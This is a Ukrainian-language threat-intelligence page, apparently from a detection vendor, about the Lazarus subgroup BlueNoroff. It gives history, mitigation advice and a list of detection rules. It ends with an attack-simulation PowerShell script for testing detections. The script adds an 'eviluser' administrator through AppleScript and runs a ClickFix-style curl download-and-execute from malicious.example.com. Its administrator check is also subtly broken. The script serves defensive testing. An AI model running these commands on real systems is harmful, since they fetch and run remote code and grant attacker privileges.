Група BlueNoroff: Фінансовий кіберзлочинний підрозділ Lazarus
Detection stack
- AIDR
- Alert
- ETL
- Query
Резюме
BlueNoroff — це фінансово вмотивована підгрупа в екосистемі Lazarus, яка зосереджується на операціях з високою цінністю проти банків, криптовалютних фірм і ширших цілей Web3. Книга гри групи охоплює шахрайство з використанням SWIFT, компрометацію водопоїв, отруєння постачальницького ланцюжка пакетів Go і шляхи вторгнення в macOS, що базуються на фейкових приманках “співбесіда на роботу”. Для досягнення виконання і заводу BlueNoroff змішує модульний стек шкідливих програм Rust/Go з AppleScript, VBScript і соціально-інженерськими робочими процесами, розробленими для обходу обережності користувачів та інтеграції в легітимну діяльність розробки та адміністрування.
Розслідування
Звіт відстежує траєкторію BlueNoroff від пограбування банку в Бангладеш у 2016 році до більш недавніх активностей у постачальницькому ланцюзі 2025 року, підкреслюючи, як інструменти та цілі актора розширювалися разом з екосистемою криптовалют/Web3. Дослідники окреслюють інфраструктурні шаблони та каталогізують компоненти шкідливих програм, включаючи GhostCall, GhostHire, RustBucket і GillyInjector. Розслідування також картиє спостережувані поведінки на MITRE ATT&CK через такі стадії, як розвідка та початковий доступ, а потім виконання, заповзятість і викрадення облікових даних, підкреслюючи постійний акцент на скритних опорах, поетапній доставці корисного навантаження та шляхах доступу, готових до крадіжки.
Пом’якшення
Зменшіть вплив, посиливши гігієну постачальницького ланцюга: перевіряйте пакунки, отримані з публічних реєстрів, впроваджуйте контроль прив’язки і походження, і постійно переглядайте оновлення залежностей на несподівані зміни в підтримувачі або коді. На macOS підсилити управління LaunchAgent/LaunchDaemon та стежте за підозрілими записами стійкості та непідписаними інструментами. Блокуйте домени, схожі на приманку, впроваджуйте MFA для привілейованих особистостей та зовнішніх сервісів, і операціоналізуйте виявлення відомих шкідливих скриптів, завантажувачів і технік запаковки, пов’язаних з актором. Підтримуйте часті оновлення розвідки загроз і зміцнюйте навчання користувачів, зосереджене на фішингу і соціально-інженерних шаблонах “рекрутер/співбесіда на роботу”.
Реакція
Якщо виявлено індикатори BlueNoroff, ізолюйте уражені хости та збережіть ключові докази, включаючи повні командні рядки, вміст скриптів і спущені бінарні файли або артефакти пакунків. Блокуйте виявлені шкідливі домени та C2 IPs, тоді виконайте сценарії реагування на інциденти, пов’язані з викраденням облікових даних і компрометацією постачальницького ланцюга. Розгорніть чи налаштуйте виявлення для ланцюжків виконання AppleScript і VBScript, а також для підозрілих шаблонів PowerShell, зазначених у звітах, тоді розширте полювання, щоб визначити додаткові кінцеві точки, вплив яких був викликаний тією ж приманкою, залежністю або перекриттям інфраструктури.
Атака Flow
Виявлення
Можливе виявлення конфігурації мережі системи (через cmdline)
Proof of Value
Можливе виявлення віддаленої системи або перевірка підключення (через cmdline)
Proof of Value
Підозрілі бінарні файли / скрипти в локації автозапуску (через file_event)
Proof of Value
Можливе перерахування адміністраторських акаунтів або груп (через cmdline)
Proof of Value
IOCs (Електронні листи) для виявлення: група BlueNoroff: фінансове кіберзлочинне крило Lazarus
Proof of Value
Виявлення шкідливого виконання AppleScript і команди ClickFix [Створення процесу Windows]
Proof of Value
Перелік локальних і доменних користувачів через Net-команди [Windows Sysmon]
Proof of Value
Виявлення обфускації та кодування BlueNoroff PowerShell [Windows PowerShell]
Proof of Value
Виконання симуляції
Передумова: передпольотна перевірка телеметрії та базових умов має бути пройдена.
Мотив: у цьому розділі детально описано точне виконання техніки супротивника (TTP), призначене для активації правила виявлення. Команди і наратив повинні безпосередньо відображати визначені TTPs та спрямовані на створення тієї самої телеметрії, що очікується логікою виявлення. Абстрактні або не пов’язані приклади призведуть до неправильної діагностики.
-
Опис атаки та команди:
- Виконання AppleScript (T1546.016) – Противник скидає шкідливий
payload.scptна кінцеву точку (наприклад, через фішингове вкладення). Використовуючи попередньо встановленийosascript.exe(упакований з інструментом третьої сторони), вони запускають скрипт для виконання завантажувача PowerShell, що додає новий локальний обліковий запис адміністратора. - Доставлення ClickFix через буфер обміну (T1204.004) – Атакуючий копіює створену команду у буфер обміну, що викликає
curlз користувацьким агентом в стилі Zoom для завантаження другого етапу корисного навантаження, а потім негайно виконує його черезcmd.exe. Команда включає також вбудованийpowershell.exe -cвиклик для виконання корисного навантаження в пам’яті.
- Виконання AppleScript (T1546.016) – Противник скидає шкідливий
-
Сценарій регресійного тестування: Сценарій нижче відтворює обидві поведінки в детермінований спосіб.
#----- ПОЧАТОК СЦЕНАРІЮ ТЕСТУ НА РЕГРЕСІЮ ----- # Переконайтеся, що ми працюємо з адміністративними привілеями if (-not ([Security.Principal.WindowsPrincipal] ` [Security.Principal.WindowsBuiltInRole] "Administrator")) { Write-Error "Запустіть цей скрипт як Адміністратор." exit 1 } # 1. Виконання AppleScript через osascript.exe $appleScriptPath = "$env:TEMPmalicious.scpt" Set-Content -Path $appleScriptPath -Value @" tell application "System Events" do shell script "powershell -c `"Add-LocalGroupMember -Group 'Administrators' -Member 'eviluser'`"" end tell "@ # Виконання AppleScript Start-Process -FilePath "osascript.exe" -ArgumentList "`"$appleScriptPath`"" -NoNewWindow -Wait # 2. Доставлення стилю ClickFix через буфер обміну $clickFixCmd = 'curl -A "ZoomSDK" http://malicious.example.com/payload.exe -o $env:TEMPpayload.exe && powershell.exe -c "Start-Process $env:TEMPpayload.exe"' # Запуск через cmd.exe відповідно до умов правила Start-Process -FilePath "cmd.exe" -ArgumentList "/c `$clickFixCmd" -NoNewWindow -Wait # Очистити: видалити артефакти Remove-Item -Path $appleScriptPath -Force Remove-Item -Path "$env:TEMPpayload.exe" -Force -ErrorAction SilentlyContinue # Кінець скрипту #----- КІНЕЦЬ СЦЕНАРІЮ ТЕСТУ НА РЕГРЕСІЮ ----- -
Команди очищення: Видаліть всі залишкові процеси, файли та обліковий запис тестування користувача.
# Зупинити всі залишкові процеси (оборонна дія – зазвичай не потрібна) Get-Process -Name "osascript","cmd","powershell","payload" -ErrorAction SilentlyContinue | Stop-Process -Force # Видалити тимчасові файли Remove-Item -Path "$env:TEMPmalicious.scpt" -Force -ErrorAction SilentlyContinue Remove-Item -Path "$env:TEMPpayload.exe" -Force -ErrorAction SilentlyContinue # Видалити тестовий обліковий запис адміністратора, якщо він був створений if (Get-LocalUser -Name "eviluser" -ErrorAction SilentlyContinue) { Remove-LocalUser -Name "eviluser" }